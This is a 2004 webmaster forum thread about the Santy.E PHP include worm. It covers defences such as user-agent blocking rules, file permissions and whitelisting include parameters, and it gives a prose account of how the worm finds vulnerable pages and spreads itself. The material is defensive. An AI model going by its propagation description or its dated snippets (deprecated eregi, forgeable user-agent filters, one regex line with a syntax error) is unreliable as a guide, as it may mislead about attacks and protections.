Forum Moderators: coopster
Santy.E worm poses threat to sites badly coded in PHP. Headline from an article posted at computerworld.com
If anyone has seen this article and has any hints on how to determine the level of risk in a particular site it would be great to hear them. I have a few sites running that use require() and include(). The story says:
Santy.C and Santy.E behave so differently from Santy.A that K-OTik is renaming the worm PhpInclude.Worm in its advisories, the company said yesterday. The worm doesn't exploit the vulnerabilities in phpBB targeted by its predecessor, instead aiming for a wider range of common programming errors in PHP Web pages. It uses search engines including Google, Yahoo and AOL to identify exploitable Web pages written in PHP that use the functions "include()" and "require()" in an insecure manner, K-OTik said.
For example, i could have an include stated by the url as index.php?include=biglist
and then, implicitely add the .php when including.
Other sites I manage never ever would include stuff from outside the _include directory.
Make sure your sites won't include any old stuff, and that they never would include anything from external servers, and you should be pretty much in the safe, at least from Santy.E
By the way. Santy.E has always identified it's user agent to be either LWP::Simple/[version number] or lwp-trivial, so I added this on top of the index.php file which is used to display all content on most of my sites:
<?php
if(eregi("LWP::Simple",getenv("HTTP_USER_AGENT"),$regs) or eregi("lwp-trivial",getenv("HTTP_USER_AGENT"),$regs)) {
print(0); exit;
}
?>
Stops them cold it does.
small edit to the php code
It's been all over all of my site. To no avail, I'm happy to say. I often use includes, but have made sure never to include exactly the stuff entered via the URL, as Santy hopes.
Where did you see evidence of it's visit? I have only a limited knowledge of PHP.
I think that we are fairly safe concerning include() based on your post, but what about require()?
Thanks for the help.
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP* [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp*
RewriteRule .* - [F]
You can put that in your Apache httpd.conf file instead. Note that you have to have the mod_rewrite engine on in either case.
Or you can use this in a htaccess file:
SetEnvIfNoCase User-Agent ".*lwp.*" spambot=1
<Limit GET POST PUT>
Order allow,deny
deny from env=spambot
allow from all
</Limit>
I used the rewrite.
Also - Make sure all your php, htm, html and asp pages are chmod 644 (which they should be already).
How do you know if they're 'attacking' your site? Simply look at your httpd log file. Where you see a user agent with lwp or LWP, you're seeing the worm trying http calls.
When I first noticed this late on 25th December my site was getting over 10 calls a minute. I checked this morning (the 28th) and it was as bad as it was on the 25th.
require()will be open to the same vulnerabilities as
include(). From what I read here it looks like this santy thing is basically an automated version of what skriptkiddies do manually. If you use 'normal' good-security php coding practices and scripts - like always checking variables used in dynamic includes (and checking them properly), you won't be vulnerable.
Good programming is part of the issue, but there's more to it than that.
What I do know is that I have definitely seen two different 'worms', or whatever, attacking my site and I've seen well over 10 requests a minute at times. I believe they are different worms because the requests are so different. The 'short' requests were easy to understand what was hapening.
The longer requests appear to be using session hashes so it might not be a buffer overflow attempt. As I said, I'm not an expert. But my point is, the 'worm' (or whatever) is being changed frequently with at least 4 variants identified so far (I believe I saw that on InfoWorld's site).
My site is relatively tight so I've had no problems, but the propagation technique is such that I personally would not assume the worms are all going to stick with attempts to exploit php includes and requires. The next one may be looking for, or doing, something else.
That's why I felt it was important to me to block the worm's http requests entirely as opposed to simply 'tightening up' php coding'. Almost everything I read is about making sure php scripts are properly written. I see little about ensuring files are set with the correct permissions (644) AND blocking the http calls from the worms.
Another aspect of blocking the worms requests is that if one doesn't, one heck of a lot of bandwidth will be used and server resources (load) will be tied up. Depending on your server, either one of these could be problematic. I have a dedicated that I chose based on estimating even heavy loads (my site is relatively small) and buying 10x that amount. In my case, even with all the calls from the worms before I blocked them I had no problems. However, I have communicated with a number of people with limited server packages (many on shared hosting) where a good part of their bandwidth allotment was eaten up and/or their server had become very 'sluggish'.
As an added comment, even though I have mod_rewrite sending requests with lwp and/or LWP in the referrer to 'nowhereland', the number of worms 'hitting' on my site has not gone down since they started on 25 December - going on 4 days now.
[edited by: coopster at 1:38 pm (utc) on Dec. 29, 2004]
[edit reason] removed url per TOS [webmasterworld.com] [/edit]
If I'm passing varibles in my query string like "?p=somepage89" & it loads a file called?p=somepage89.ext and the ext isn't php is that ok or not?
I have a site that has alot of sections that call a template to load the content for each section differently as each section requires different formatting. I used includes in this fashion to call them.
Is there a better way if it's wrong?
I dont really want to build 50+ switches into each page.
file_get_contents()[/url]to go grab external web pages, or CURL.
A thing like this will start off with a search engine, looking randomly for url's that are obviously in php, and are most likely to use unprotected dynamic includes. It will then go to that url, and try requesting a page with the parameter name it thinks is exploitable, and a url of a remote page with some sample code in it as the parameter value - a parameter passed inside this url basically tells what code to generate. It'll see if the page requested looks like it included that code, and if it did, it will start doing things like trying to read different directories. It will test these directories to see if they are writeable, trying to find one inside the webroot preferably. Then it will write itself to this directory, and call itself in the mode where it starts off again searching for vulnerable url's and doing the whole thing again.
Sypher_5: it doesn't matter what extension file you include or require; PHP will begin parsing these as php if it finds the opening php tag. A big switch table would be one means of security; a better means is a naming convention, so you know that the only files which are permitted by a dynamic include are ones that fit a certain name pattern. In your case, you could do something like this to check:
if(preg_match('#^somepage[0-9]*\.ext$#', $_GET['p']')) include $_GET['p'];
This way you know that the string $_GET['p'] begins with "somepage", is followed (optionally) by a number of integers, and is followed by .ext and ends there, with nothing else allowed (i.e., it doesn't have 'http://' in the beginning, or 'ftp://' or anything else that could get a remote file - and it doesn't have double dots and a slash, which would mean it's traversing down your directory tree). If you use preg's, make sure you have the carret ^ and dollar sign $ at the beginning and end of the expression, in the right places (otherwise it will match anything that just contains this portion, and doesn't demand that this encompasses the beginning and the end of the string - or rather, matches the whole string and nothing else is allowed).
For coders who aren't yet comfortable with regexes, you can pass only a portion of the file name and use the function
ctype_alnum() [be.php.net]to check that string to make sure it's just letters and numbers, and add your own directory and extension information and whatever else you want to it with string concatenation - this way you're also sure at least that what you are including is from your particular directory, the name only has letters and numbers in it, and it has the extension you indicate.
Another thing you can do is ask your host to turn off fopen url wrappers, which will prevent all remote includes - this will also prevent you, though, from grabbing off-site files, like xml feeds.
Checking referrers or user agents may well work at this point, but don't forget that the next round of similar critters will probably forge these. Blocking the http requests will save you bandwidth now, but won't help so much later.
mods, if you're uncomfortable with anything here, I quite understand.